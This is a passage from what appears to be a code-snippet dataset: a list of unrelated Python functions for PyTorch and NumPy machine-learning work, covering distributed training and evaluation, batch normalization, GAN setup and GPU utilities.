\"nccl\":\n # ASYNC mode -- enabled only for nccl backend\n ack = to_device(torch.tensor(1))\n dist.isend(tensor=ack, dst=0)\n _send_train_output(output)\n else:\n # SYNC mode -- gloo backend does not have a non-blocking way to check if the operation is completed\n gather_objects = [output for i in range(size())]\n output = [None for _ in gather_objects]\n dist.all_gather_object(output, gather_objects[rank()])\n\n # Some cleanup\n torch.cuda.empty_cache()\n torch.cuda.synchronize() if torch.cuda.is_available() else None\n\n if self.do_profiling:\n profiler.disable()\n print_profiler(profiler)\n\n elif command == COMMAND_TESTVAL:\n print_rank(f\"COMMMAND_TESTVAL received {rank()}\", loglevel=logging.DEBUG)\n\n # Init profiler in validation worker\n profiler = None\n if self.do_profiling:\n profiler = cProfile.Profile()\n 
profiler.enable()\n \n # Receive mode and client id from Server\n mode = _recv(mode)\n mode = \"test\" if mode == -2 else \"val\"\n client_idx = _recv(client_idx)\n print_rank(f\"Client idx received from Server: {client_idx}, {mode}\", loglevel=logging.DEBUG)\n \n # Get client and dataset\n clients = self.val_clients if mode == \"val\" else self.test_clients\n dataset = self.val_dataset if mode == \"val\" else self.test_dataset\n clients_queue = clients.copy()\n assert 0 <= client_idx < len(clients_queue)\n client_to_process = clients_queue.pop(client_idx)\n\n # Execute Client.get_data()\n client_data = client_to_process.get_client_data(dataset)\n \n # Execute Client.run_testvalidate()\n output = client_to_process.run_testvalidate(client_data, server_data, mode, self.model)\n\n # Send output back to Server\n if dist.get_backend() == \"nccl\":\n # ASYNC mode -- enabled only for nccl backend\n _, metrics, num_instances = output\n metrics['num']= {'value': float(num_instances), 'higher_is_better': False}\n output = metrics\n print_rank(f\"Worker {rank()} output {output}\", loglevel=logging.DEBUG)\n ack = to_device(torch.tensor(1))\n dist.isend(tensor=ack, dst=0)\n _send_metrics(output)\n else:\n # SYNC mode -- gloo backend does not have a non-blocking way to check if the operation is completed\n gather_objects = [output for i in range(size())]\n output = [None for _ in gather_objects]\n dist.all_gather_object(output, gather_objects[rank()])\n print_rank(f\"Worker {rank()} sent output back\", loglevel=logging.DEBUG)\n\n # Some cleanup\n torch.cuda.empty_cache()\n torch.cuda.synchronize() if torch.cuda.is_available() else None\n\n if self.do_profiling:\n profiler.disable()\n print_profiler(profiler)\n\n elif command == COMMAND_TERMINATE:\n print_rank(f\"COMMMAND_TERMINATE received {rank()}\", loglevel=logging.DEBUG)\n\n # Some cleanup\n torch.cuda.empty_cache()\n torch.cuda.synchronize() if torch.cuda.is_available() else None\n return\n\n elif command == COMMAND_SYNC_NODES: # Only for sync calls\n print_rank(f\"COMMMAND_SYNC_NODES received {rank()}\", loglevel=logging.DEBUG)\n\n gather_objects = [None for i in range(size())]\n output = [None for _ in gather_objects]\n dist.all_gather_object(output, gather_objects[rank()])\n print_rank(f\"Worker IDLE {rank()} sent dummy output back\", loglevel=logging.DEBUG)\n\n # Some cleanup\n torch.cuda.empty_cache()\n torch.cuda.synchronize() if torch.cuda.is_available() else None\n else:\n assert False, \"unknown command\"", "def validate_average_rank(self) -> float:\n logger.info('Average rank validation ...')\n\n args = self.args\n self.biencoder.eval()\n distributed_factor = self.distributed_factor\n\n if args.use_dict_input:\n data_iterator = self.get_dict_data_iterator(args.dev_psgs_file, args.dev_queries_file,\n args.dev_qrels_file, args.dev_trec_file,\n args.dev_batch_size,\n shuffle=False, split=False)\n else:\n data_iterator = self.get_data_iterator(args.dev_file, args.dev_batch_size, shuffle=False)\n\n sub_batch_size = args.val_av_rank_bsz\n sim_score_f = ClusterNllLoss.get_similarity_function()\n q_represenations = []\n ctx_represenations = []\n positive_idx_per_question = []\n\n num_hard_negatives = args.val_av_rank_hard_neg\n num_other_negatives = args.val_av_rank_other_neg\n\n log_result_step = args.log_batch_step\n\n for i, samples_batch in enumerate(data_iterator.iterate_data()):\n # samples += 1\n if len(q_represenations) > args.val_av_rank_max_qs / distributed_factor:\n break\n\n biencoder_input = 
ClusterBertEncoder.create_biencoder_input(samples_batch, self.tensorizer,\n True,\n max_query_length=args.query_sequence_length,\n max_doc_length=args.sequence_length,\n num_hard_negatives=num_hard_negatives,\n num_other_negatives=num_other_negatives,\n shuffle=False)\n total_ctxs = len(ctx_represenations)\n ctxs_ids = biencoder_input.context_ids\n ctxs_segments = biencoder_input.ctx_segments\n bsz = ctxs_ids.size(0)\n\n # split contexts batch into sub batches since it is supposed to be too large to be processed in one batch\n for j, batch_start in enumerate(range(0, bsz, sub_batch_size)):\n\n q_ids, q_segments = (biencoder_input.question_ids, biencoder_input.question_segments) if j == 0 \\\n else (None, None)\n\n if j == 0 and args.n_gpu > 1 and q_ids.size(0) == 1:\n # if we are in DP (but not in DDP) mode, all model input tensors should have batch size >1 or 0,\n # otherwise the other input tensors will be split but only the first split will be called\n continue\n\n ctx_ids_batch = ctxs_ids[batch_start:batch_start + sub_batch_size]\n ctx_seg_batch = ctxs_segments[batch_start:batch_start + sub_batch_size]\n\n q_attn_mask = self.tensorizer.get_attn_mask(q_ids)\n ctx_attn_mask = self.tensorizer.get_attn_mask(ctx_ids_batch)\n with torch.no_grad():\n q_dense, ctx_dense = self.biencoder(q_ids, q_segments, q_attn_mask, ctx_ids_batch, ctx_seg_batch,\n ctx_attn_mask)\n\n if q_dense is not None:\n q_represenations.extend(q_dense.cpu().split(1, dim=0))\n\n ctx_represenations.extend(ctx_dense.cpu().split(1, dim=0))\n\n batch_positive_idxs = biencoder_input.is_positive\n positive_idx_per_question.extend([total_ctxs + v for v in batch_positive_idxs])\n\n if (i + 1) % log_result_step == 0:\n logger.info('Av.rank validation: step %d, computed ctx_vectors %d, q_vectors %d', i,\n len(ctx_represenations), len(q_represenations))\n\n ctx_represenations = torch.cat(ctx_represenations, dim=0)\n q_represenations = torch.cat(q_represenations, dim=0)\n\n logger.info('Av.rank validation: total q_vectors size=%s', q_represenations.size())\n logger.info('Av.rank validation: total ctx_vectors size=%s', ctx_represenations.size())\n\n q_num = q_represenations.size(0)\n assert q_num == len(positive_idx_per_question)\n\n scores = sim_score_f(q_represenations, ctx_represenations)\n values, indices = torch.sort(scores, dim=1, descending=True)\n\n rank = 0\n for i, idx in enumerate(positive_idx_per_question):\n # aggregate the rank of the known gold passage in the sorted results for each question\n gold_idx = (indices[i] == idx).nonzero()\n rank += gold_idx.item()\n\n if distributed_factor > 1:\n # each node calcuated its own rank, exchange the information between node and calculate the \"global\" average rank\n # NOTE: the set of passages is still unique for every node\n eval_stats = all_gather_list([rank, q_num], max_size=1000)\n for i, item in enumerate(eval_stats):\n remote_rank, remote_q_num = item\n if i != args.local_rank:\n rank += remote_rank\n q_num += remote_q_num\n\n av_rank = float(rank / q_num)\n logger.info('Av.rank validation: average rank %s, total questions=%d', av_rank, q_num)\n return av_rank", "def main():\n\n global G\n global C\n global D\n\n global device\n\n global c_solver\n global g_solver\n global d_optimiser\n\n global BCELossFunc\n\n # define random seed to allow reporducibility\n seed = 97\n torch.manual_seed(seed)\n random.seed(seed)\n\n # optimise for GPU learned from Vanilla GAN tutorial:\n # 
https://medium.com/ai-society/gans-from-scratch-1-a-deep-introduction-with-code-in-pytorch-and-tensorflow-cb03cdcdba0f\n device = torch.device(\"cuda:0\" if (torch.cuda.is_available() and NUM_GPUS > 0) else \"cpu\")\n\n # Generator\n G = Generator(NUM_GPUS).to(device)\n G.apply(initialise_weights)\n if (device.type == 'cuda') and (NUM_GPUS > 1):\n G = nn.DataParallel(G, list(range(NUM_GPUS)))\n\n # Discriminator\n C = Critic(NUM_GPUS).to(device)\n C.apply(initialise_weights)\n if (device.type == 'cuda') and (NUM_GPUS > 1):\n C = nn.DataParallel(C, list(range(NUM_GPUS)))\n\n # Discriminator\n D = Discriminator(NUM_GPUS).to(device)\n D.apply(initialise_weights)\n if (device.type == 'cuda') and (NUM_GPUS > 1):\n D = nn.DataParallel(D, list(range(NUM_GPUS)))\n\n # loss function and optimisers as in DCGAN paper\n BCELossFunc = nn.BCELoss()\n d_optimiser = optim.Adam(D.parameters(), lr=1e-4)\n\n # loss function and optimisers\n c_solver = optim.RMSprop(C.parameters(), lr=1e-4)\n g_solver = optim.RMSprop(G.parameters(), lr=1e-4)\n\n path = \"../output/WGAN/newResults\"\n\n epochs = train(path)\n\n # last parameter is optional for saving critic\n save_model(D, G, path, epochs, C)", "def update_grhs():\n init_gradient()\n costs_per_batch = []\n for i in range(n_train_batches):\n c = update_gradient_batch(i,*args)\n costs_per_batch.append(c)\n return numpy.mean(costs_per_batch,axis=0)", "def compute_values(self, update_statistics=False):\n\n self.compute_iterations()\n self.axsec = sum([one.axsec for one in self])\n self.xsec = sum([one.xsec for one in self])\n self.xerrc = sum([one.xerrc for one in self])\n self.xerru = math.sqrt(sum([one.xerru**2 for one in self]))\n\n self.nevents = sum([one.nevents for one in self])\n self.nw = sum([one.nw for one in self])\n self.maxit = len(self.yerr_iter) # \n self.nunwgt = sum([one.nunwgt for one in self]) \n self.wgt = 0\n self.luminosity = min([0]+[one.luminosity for one in self])\n if update_statistics:\n self.run_statistics.aggregate_statistics([_.run_statistics for _ in self])", "def batchnorm_forward(x, gamma, beta, bn_param):\n mode = bn_param['mode']\n eps = bn_param.get('eps', 1e-5)\n momentum = bn_param.get('momentum', 0.9)\n\n N, D = x.shape\n running_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))\n running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))\n\n out, cache = None, None\n \n mu = np.mean(x, axis=0)\n var = np.var(x, axis=0)\n sigma = np.sqrt(var+eps)\n if mode == 'train':\n #######################################################################\n # TODO: Implement the training-time forward pass for batch norm. #\n # Use minibatch statistics to compute the mean and variance, use #\n # these statistics to normalize the incoming data, and scale and #\n # shift the normalized data using gamma and beta. #\n # #\n # You should store the output in the variable out. Any intermediates #\n # that you need for the backward pass should be stored in the cache #\n # variable. #\n # #\n # You should also use your computed sample mean and variance together #\n # with the momentum variable to update the running mean and running #\n # variance, storing your result in the running_mean and running_var #\n # variables. #\n # #\n # Note that though you should be keeping track of the running #\n # variance, you should normalize the data based on the standard #\n # deviation (square root of variance) instead! # \n # Referencing the original paper (https://arxiv.org/abs/1502.03167) #\n # might prove to be helpful. 
#\n #######################################################################\n out = gamma * (x - mu)/sigma + beta\n #out = (x - mu)/sigma\n #out = out * gamma.T + beta.T\n #print(gamma.shape)\n #out = out * gamma + beta\n #print(out.shape)\n \n running_mean = momentum * running_mean + (1 - momentum) * mu\n running_var = momentum * running_var + (1 - momentum) * (var+eps)\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n elif mode == 'test':\n #######################################################################\n # TODO: Implement the test-time forward pass for batch normalization. #\n # Use the running mean and variance to normalize the incoming data, #\n # then scale and shift the normalized data using gamma and beta. #\n # Store the result in the out variable. #\n #######################################################################\n out = (x - running_mean) / np.sqrt(running_var) * gamma + beta\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n else:\n raise ValueError('Invalid forward batchnorm mode \"%s\"' % mode)\n\n # Store the updated running means back into bn_param\n bn_param['running_mean'] = running_mean\n bn_param['running_var'] = running_var\n cache = (x, mu, sigma, gamma, beta)\n return out, cache", "def grad_ptycho_multi_gpu(self, data, psi, prb, scan, hlamd, rho, piter, recover_prb, lock, ids):\n global BUSYGPUS\n lock.acquire() # will block if lock is already held\n for k in range(self.ngpus):\n if BUSYGPUS[k] == 0:\n BUSYGPUS[k] = 1\n gpu = k\n break\n lock.release()\n\n cp.cuda.Device(gpu).use()\n data_gpu = cp.array(data[ids], order='C')\n psi_gpu = cp.array(psi[ids])\n hlamd_gpu = cp.array(hlamd[ids])\n prb_gpu = cp.array(prb[ids])\n scan_gpu = cp.array(scan[:, ids])\n\n psi_gpu, prb_gpu = self.grad_ptycho(\n data_gpu, psi_gpu, prb_gpu, scan_gpu, hlamd_gpu, rho, piter, recover_prb, gpu)\n\n psi[ids] = psi_gpu.get()\n prb[ids] = prb_gpu.get()\n\n BUSYGPUS[gpu] = 0\n\n return psi[ids], prb[ids]", "def test_distributed(self):\n self.model.eval()\n test_loss, test_correct_preds = 0, defaultdict(int)\n if self.test_loader is None: # running G2E\n self.test_loader, self.test_size, self.test_sampler = self._get_smi_dl(phase=\"test\", shuffle=False)\n self.test_sampler.set_epoch(0)\n if self.rank == 0:\n test_loader = tqdm(self.test_loader, desc='testing...')\n else:\n test_loader = self.test_loader\n \n running_topk_accs = defaultdict(lambda: np.nan)\n with torch.no_grad():\n epoch_test_size = 0\n for i, batch in enumerate(test_loader):\n batch_data = batch[0]\n if not isinstance(batch_data, tuple):\n batch_data = batch_data.cuda(non_blocking=True)\n if self.model_name == 'TransformerEBM':\n batch_data = (batch_data, 'test')\n batch_mask = batch[1].cuda(non_blocking=True)\n batch_energies = self._one_batch(\n batch_data, batch_mask, backprop=False,\n )\n test_batch_size = batch_energies.shape[0]\n test_batch_size = torch.tensor([test_batch_size]).cuda(self.gpu, non_blocking=True)\n dist.all_reduce(test_batch_size, dist.ReduceOp.SUM)\n test_batch_size = test_batch_size.item()\n epoch_test_size += test_batch_size\n\n # for validation/test data, true rxn may not be present!\n batch_idx = batch[2]\n batch_true_ranks_array = self.proposals_data['test'][batch_idx, 2].astype('int')\n batch_true_ranks_valid = 
batch_true_ranks_array[batch_true_ranks_array < self.args.minibatch_eval]\n batch_true_ranks = torch.as_tensor(batch_true_ranks_array).unsqueeze(dim=-1)\n # slightly tricky as we have to ignore rxns with no 'positive' rxn for loss calculation\n # (bcos nothing in the numerator, loss is undefined)\n loss_numerator = batch_energies[\n np.arange(batch_energies.shape[0])[batch_true_ranks_array < self.args.minibatch_eval],\n batch_true_ranks_valid\n ]\n loss_denominator = batch_energies[\n np.arange(batch_energies.shape[0])[batch_true_ranks_array < self.args.minibatch_eval],\n :\n ]\n batch_loss = (loss_numerator + torch.logsumexp(-loss_denominator, dim=1)).sum().item()\n\n for k in self.k_to_test:\n # index with lowest energy is what the model deems to be the most feasible rxn\n batch_preds = torch.topk(batch_energies, k=k, dim=1, largest=False)[1] \n batch_correct_preds = torch.where(batch_preds == batch_true_ranks)[0].shape[0]\n batch_correct_preds = torch.tensor([batch_correct_preds]).cuda(self.gpu, non_blocking=True)\n dist.all_reduce(batch_correct_preds, dist.ReduceOp.SUM)\n batch_correct_preds = batch_correct_preds.item()\n test_correct_preds[k] += batch_correct_preds\n running_topk_accs[k] = test_correct_preds[k] / epoch_test_size\n\n if k == 1 and self.rank == 0: # overhead is only 5 ms, will check ~5 times each epoch (regardless of batch_size)\n try:\n for j in range(i * self.args.batch_size_eval, (i+1) * self.args.batch_size_eval):\n if j % (self.test_size // 5) == random.randint(0, 3) or j % (self.test_size // 8) == random.randint(0, 5): # peek at a random sample of current batch to monitor training progress\n rxn_idx = random.sample(list(range(self.args.batch_size_eval)), k=1)[0]\n rxn_true_rank = batch_true_ranks_array[rxn_idx]\n rxn_pred_rank = batch_preds[rxn_idx, 0].item()\n rxn_pred_energy = batch_energies[rxn_idx, rxn_pred_rank].item()\n rxn_true_energy = batch_energies[rxn_idx, rxn_true_rank].item() if rxn_true_rank != 9999 else 'NaN'\n rxn_orig_energy = batch_energies[rxn_idx, 0].item()\n rxn_orig_energy2 = batch_energies[rxn_idx, 1].item()\n rxn_orig_energy3 = batch_energies[rxn_idx, 2].item()\n\n rxn_true_prod = self.proposals_data['test'][batch_idx[rxn_idx], 0]\n rxn_true_prec = self.proposals_data['test'][batch_idx[rxn_idx], 1]\n rxn_cand_precs = self.proposals_data['test'][batch_idx[rxn_idx], 3:]\n rxn_pred_prec = rxn_cand_precs[batch_preds[rxn_idx]]\n rxn_orig_prec = rxn_cand_precs[0]\n rxn_orig_prec2 = rxn_cand_precs[1]\n rxn_orig_prec3 = rxn_cand_precs[2]\n logging.info(f'\\ntrue product: \\t\\t\\t\\t{rxn_true_prod}')\n logging.info(f'pred precursor (rank {rxn_pred_rank}, energy = {rxn_pred_energy:+.4f}):\\t\\t\\t{rxn_pred_prec}')\n if rxn_true_energy == 'NaN':\n logging.info(f'true precursor (rank {rxn_true_rank}, energy = {rxn_true_energy}):\\t\\t\\t\\t{rxn_true_prec}')\n else:\n logging.info(f'true precursor (rank {rxn_true_rank}, energy = {rxn_true_energy:+.4f}):\\t\\t\\t{rxn_true_prec}')\n logging.info(f'orig precursor (rank 0, energy = {rxn_orig_energy:+.4f}):\\t\\t\\t{rxn_orig_prec}')\n logging.info(f'orig precursor (rank 1, energy = {rxn_orig_energy2:+.4f}):\\t\\t\\t{rxn_orig_prec2}')\n logging.info(f'orig precursor (rank 2, energy = {rxn_orig_energy3:+.4f}):\\t\\t\\t{rxn_orig_prec3}\\n')\n break\n except Exception as e:\n tb_str = traceback.format_exception(etype=type(e), value=e, tb=e.__traceback__)\n logging.info(\"\".join(tb_str))\n logging.info('\\nIndex out of range (last minibatch)')\n \n batch_loss = torch.tensor([batch_loss]).cuda(self.gpu, 
non_blocking=True)\n dist.all_reduce(batch_loss, dist.ReduceOp.SUM)\n batch_loss = batch_loss.item()\n test_loss += batch_loss\n if self.rank == 0:\n test_loader.set_description(f\"testing...loss={test_loss / test_batch_size:.4f}, top-1 acc={running_topk_accs[1]:.4f}, top-5 acc={running_topk_accs[5]:.4f}, top-10 acc={running_topk_accs[10]:.4f}\")\n test_loader.refresh()\n \n for k in self.k_to_test:\n self.test_topk_accs[k] = test_correct_preds[k] / epoch_test_size\n \n dist.barrier()\n message = f\"{self.args.expt_name}\\n\"\n if self.rank == 0:\n logging.info(f'\\nTest loss: {test_loss / epoch_test_size:.4f}')\n for k in self.k_to_test:\n this_topk_message = f'Test top-{k} accuracy: {100 * self.test_topk_accs[k]:.3f}%'\n logging.info(this_topk_message)\n message += this_topk_message + '\\n'\n try:\n send_message(message)\n except Exception as e:\n pass", "def perturb_and_get_rank(embedding, w, a, r, b, test_size, batch_size=100, all_batches=True, flow_log_prob=None):\n n_batch = (test_size + batch_size - 1) // batch_size\n ranks = []\n if all_batches is False:\n n_batch = 1\n # import ipdb;ipdb.set_trace()\n for idx in range(n_batch): # n_batch TODO\n batch_start = idx * batch_size\n batch_end = min(test_size, (idx + 1) * batch_size)\n batch_a = a[batch_start: batch_end]\n batch_r = r[batch_start: batch_end]\n emb_ar = embedding[batch_a] * w[batch_r]\n emb_ar = emb_ar.transpose(0, 1).unsqueeze(2) # size: D x E x 1\n emb_c = embedding.transpose(0, 1).unsqueeze(1) # size: D x 1 x V\n # out-prod and reduce sum\n out_prod = torch.bmm(emb_ar, emb_c) # size D x E x V\n score = torch.sum(out_prod, dim=0) # size E x V\n if score is not None:\n score = score + flow_log_prob\n score = torch.sigmoid(score)\n target = b[batch_start: batch_end]\n ranks.append(sort_and_rank(score, target))\n\n _running_ranks = 1.0+torch.cat((ranks)).float()\n mrr = torch.mean(1.0 / _running_ranks)\n mr = torch.mean(_running_ranks)\n avg_count = []\n for hit in [1,5,10]:\n avg_count.append( torch.mean((_running_ranks <= hit).float()).item())\n print(\"batch {} / {}: MR : {:.6f} | MRR : {:.6f} | Hit1: {:.6f} | Hit5: {:.6f} | Hit10: {:.6f}\".format(\n idx, n_batch, mr.item(), mrr.item(), avg_count[0], avg_count[1], avg_count[2]))\n\n return torch.cat(ranks)", "def calc_and_store_numba(kernel, storage_backend, fft_data, ch_it, info_dict):\n from mpi4py import MPI\n import datetime\n from socket import gethostname\n import numpy as np\n import math\n\n comm = MPI.COMM_WORLD\n\n # Code below tests dummy kernel\n # out_arr = np.zeros(100)\n # threadsperblock = 32\n # blockspergrid = (out_arr.size + (threadsperblock - 1)) // threadsperblock\n # kernel[blockspergrid, threadsperblock](out_arr)\n # End test of dummy kernel\n\n result = np.zeros([len(ch_it), fft_data.data.shape[1], 3], dtype=fft_data.data.dtype)\n \n threads_per_block = (32, 32)\n num_blocks = [math.ceil(s / t) for s, t in zip(result.shape, threads_per_block)]\n ch1_idx_arr = np.array([c.ch1.get_idx() for c in ch_it])\n ch2_idx_arr = np.array([c.ch2.get_idx() for c in ch_it])\n win_factor = 1.0\n\n # Try changing flags to C_CONTIGUOUS\n # Passing fft_data.data directly into the kernel always fails.\n # I checked size and passing a dummy array of similar shape and dtype.\n # That worked, buy never fft_data.data\n # I also checked the flags. fft_data.data.C_CONTIGUOUS was false. 
Setting it to true\n # also didn't allow me to pass this into the kernel.\n # Now I'm doing this here:\n dummy = np.zeros(fft_data.data.shape, dtype=fft_data.data.dtype)\n dummy[:] = fft_data.data[:]\n\n t1_calc = datetime.datetime.now()\n kernel[num_blocks, threads_per_block](dummy, result, ch1_idx_arr, ch2_idx_arr, win_factor)\n\n t2_calc = datetime.datetime.now()\n\n t1_io = datetime.datetime.now()\n storage_backend.store_data(result, info_dict)\n dt_io = datetime.datetime.now() - t1_io\n\n with open(f\"outfile_{comm.rank:03d}.txt\", \"a\") as df:\n # df.write(f\"success: num_blocks={num_blocks}, tpb={threads_per_block}... {fft_data.data.dtype}, {fft_data.data.shape}... \")\n # df.write(f\"dummy: {dummy.flags}, fft_data.data: {fft_data.data.flags}\")\n df.write((f\"rank {comm.rank:03d}/{comm.size:03d}: \"\n f\"tidx={info_dict['chunk_idx']} {info_dict['analysis_name']} \"\n f\"start {t1_calc.isoformat(sep=' ')} \"\n f\"end {t2_calc.isoformat(sep=' ')} \"\n f\"Storage: {dt_io} {gethostname()}\\n\"))\n df.flush()\n\n return None", "def compute(self) -> Tuple[float, float, float]:\n # ddp hotfix, could be done better\n # but metric must handle DDP on it's own\n if self._ddp_backend == \"xla\":\n self.statistics = {\n k: xm.mesh_reduce(k, v, np.sum) for k, v in self.statistics.items()\n }\n elif self._ddp_backend == \"ddp\":\n for key in self.statistics:\n value: List[int] = all_gather(self.statistics[key])\n value: int = sum(value)\n self.statistics[key] = value\n\n precision_value, recall_value, f1_value = get_binary_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n zero_division=self.zero_division,\n )\n return precision_value, recall_value, f1_value", "def update_prior_dist(batch_size, alpha, beta):\n global prior_dist\n grid_points = torch.arange(1., 2*batch_size, 2.).float().cuda() / (2*batch_size)\n grid_points_np = grid_points.cpu().numpy()\n grid_points_icdf = stats.beta.ppf(grid_points_np, a=alpha, b=beta)\n prior_dist = torch.tensor(grid_points_icdf).float().cuda().unsqueeze(1)", "def batchnorm_forward(x, gamma, beta, bn_param):\n mode = bn_param['mode']\n eps = bn_param.get('eps', 1e-5)\n momentum = bn_param.get('momentum', 0.9)\n\n N, D = x.shape\n running_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))\n running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))\n\n out, cache = None, None\n if mode == 'train':\n #######################################################################\n # TODO: Implement the training-time forward pass for batch norm. #\n # Use minibatch statistics to compute the mean and variance, use #\n # these statistics to normalize the incoming data, and scale and #\n # shift the normalized data using gamma and beta. #\n # #\n # You should store the output in the variable out. Any intermediates #\n # that you need for the backward pass should be stored in the cache #\n # variable. #\n # #\n # You should also use your computed sample mean and variance together #\n # with the momentum variable to update the running mean and running #\n # variance, storing your result in the running_mean and running_var #\n # variables. #\n # #\n # Note that though you should be keeping track of the running #\n # variance, you should normalize the data based on the standard #\n # deviation (square root of variance) instead! # \n # Referencing the original paper (https://arxiv.org/abs/1502.03167) #\n # might prove to be helpful. 
#\n #######################################################################\n \n sample_mean = np.mean(x, axis=0)\n sample_variance = np.var(x, axis=0)\n \n running_mean = momentum * running_mean + (1 - momentum) * sample_mean\n running_var = momentum * running_var + (1 - momentum) * sample_variance\n \n num = x - sample_mean\n denom = np.sqrt(sample_variance + eps)\n \n x_hat = num/denom\n out = gamma*x_hat + beta\n \n cache = (gamma, x_hat, num, denom, eps, sample_variance)\n\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n elif mode == 'test':\n #######################################################################\n # TODO: Implement the test-time forward pass for batch normalization. #\n # Use the running mean and variance to normalize the incoming data, #\n # then scale and shift the normalized data using gamma and beta. #\n # Store the result in the out variable. #\n #######################################################################\n num = x - running_mean\n denom = np.sqrt(running_var + eps)\n \n x_hat = num/denom\n out = gamma*x_hat + beta\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n else:\n raise ValueError('Invalid forward batchnorm mode \"%s\"' % mode)\n\n # Store the updated running means back into bn_param\n bn_param['running_mean'] = running_mean\n bn_param['running_var'] = running_var\n\n return out, cache", "def CUDA(self):\n\n if helpers.CUDA:\n self.generator.cuda()\n self.discriminator.cuda()\n self.adv_loss.cuda()", "def calculate_macs(self) -> None:\n for name, param in self.module.named_parameters():\n if name == \"weight\":\n # ignore N, C when calculate Mult-Adds in ConvNd\n if \"Conv\" in self.class_name:\n self.macs += int(param.nelement() * prod(self.output_size[2:]))\n else:\n self.macs += param.nelement()\n # RNN modules have inner weights such as weight_ih_l0\n elif \"weight\" in name:\n self.macs += param.nelement()", "def get_nml_probs(x, model, data=None, normalize=True, num_classes=2, query_point_weight=20, dist_weight_thresh=None, \n num_grad_steps=10, lr=0.01, batch_size=32, grad_penalty=None, verbose=False, \n show_plots=False, plotting_2d=False, return_params=False):\n results = []\n data = data or DEFAULT_DATA\n orig_inputs, orig_targets = data\n \n if show_plots and plotting_2d:\n plt.figure()\n plt.title(f\"Original rewards\")\n plot_rewards(model, contours=True)\n plot_dataset(data)\n \n marker_for_class = {\n 0: 'x',\n 1: '*'\n }\n \n model.cuda()\n num_batches = ceil(len(orig_inputs) / batch_size)\n\n # NOTE train on gpu, move back to cpu for eval\n \n for proposed_class in range(num_classes):\n new_model = copy.deepcopy(model)\n new_model.cuda()\n \n # Sample all of the adaptation batches in advance\n optimizer = optim.SGD(new_model.parameters(), lr=lr)\n \n for _ in range(num_grad_steps):\n idxs = np.random.permutation(range(len(orig_inputs)))[:batch_size-1]\n X, y = orig_inputs[idxs], orig_targets[idxs]\n X = torch.Tensor(np.vstack((X, x))).cuda()\n y = torch.Tensor(np.hstack((y, proposed_class))).long().cuda()\n \n logits = new_model(X)\n loss = F.cross_entropy(logits, y, reduction='none')\n \n if dist_weight_thresh:\n weights = np.exp(-np.linalg.norm(x - X.cpu().numpy(), axis=-1) * 2.3 / dist_weight_thresh)\n else:\n weights = np.ones(len(y))\n \n weights[-1] *= query_point_weight * 1. 
/ num_batches\n weights = torch.Tensor(weights).cuda()\n loss = torch.sum(loss * weights) / torch.sum(weights)\n \n loss.backward()\n optimizer.step()\n \n new_model.cpu()\n \n with torch.no_grad():\n x_tensor = torch.Tensor(x[None])\n probs = torch.softmax(new_model(x_tensor), -1)\n results.append(probs[0][proposed_class].item())\n \n if show_plots:\n new_model.to(torch.device(\"cpu\"))\n\n if plotting_2d: \n plt.figure()\n plot_rewards(new_model, contours=True, env = False, title=f\"Finetuning on label {proposed_class}\")\n plot_dataset(data)\n plt.scatter(x[0], x[1], marker=marker_for_class[proposed_class], color='w', s=100)\n \n plt.figure()\n plt.title(f\"Losses for label {proposed_class}\")\n plt.plot(losses)\n \n plt.figure()\n plt.title(f\"x loss for label {proposed_class}\")\n plt.plot(x_losses)\n \n plt.figure()\n plt.title(f\"x probs for label {proposed_class}\")\n plt.plot(x_vals)\n \n model.cpu()\n \n if normalize:\n results = np.array(results) / sum(results)\n else:\n results = np.array(results)\n return results if not return_params else (results, new_model)", "def compute_all(self) -> None:\n self.compute_j_matrix()\n self.compute_outter_distribution()\n self.compute_max_prior()\n self.compute_max_poutter()", "def conv_bn_relu_backward(dout, cache):\n conv_cache, sbn_cache, relu_cache = cache\n da = relu_backward(dout, relu_cache)\n dan, dgamma, dbeta = spatial_batchnorm_backward(da, sbn_cache)\n dx, dw, db = conv_backward_fast(dan, conv_cache)\n return dx, dw, db, dgamma, dbeta", "def reset_ref_batch(self, batch):\n with torch.no_grad():\n self.labels = batch[1]\n self.batch = batch[0]\n _, self.r_act_2, _ = self.inference_net(self.batch.cuda(self.gpu_id))\n\n self.mu2_c0, self.sigma2_c0 = calc_stats(self.r_act_2[self.labels.view(-1) == 0])\n self.mu2_c1, self.sigma2_c1 = calc_stats(self.r_act_2[self.labels.view(-1) == 1])", "def setup_gpu_and_random(config):\n random.seed(config.general.manualSeed)\n np.random.seed(config.general.manualSeed)\n torch.manual_seed(config.general.manualSeed)\n torch.cuda.manual_seed(config.general.manualSeed)\n\n cudnn.benchmark = True\n cudnn.deterministic = True\n config.num_gpu = torch.cuda.device_count()\n\n if config.num_gpu > 1:\n print('------ Use multi-GPU setting ------')\n print('if you stuck too long time with multi-GPU setting, try to set --workers 0')\n # check multi-GPU issue https://github.com/clovaai/deep-text-recognition-benchmark/issues/1\n config.workers = config.workers * config.num_gpu\n config.batch_size = config.batch_size * config.num_gpu\n\n \"\"\" previous version\n print('To equlize batch stats to 1-GPU setting, the batch_size is multiplied with num_gpu and multiplied batch_size is ', opt.batch_size)\n opt.batch_size = opt.batch_size * opt.num_gpu\n print('To equalize the number of epochs to 1-GPU setting, num_iter is divided with num_gpu by default.')\n If you dont care about it, just commnet out these line.)\n opt.num_iter = int(opt.num_iter / opt.num_gpu)\n \"\"\"", "def compute(self) -> Tuple[float, float, float]:\n # @TODO: ddp hotfix, could be done better\n if self._is_ddp:\n for key in self.statistics:\n value: List[float] = all_gather(self.statistics[key])\n value: float = sum(value)\n self.statistics[key] = value\n\n precision_value, recall_value, f1_value = get_binary_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n zero_division=self.zero_division,\n )\n return precision_value, recall_value, f1_value", "def prediction_aggregation(self, xt_s,mu_s,var_s, 
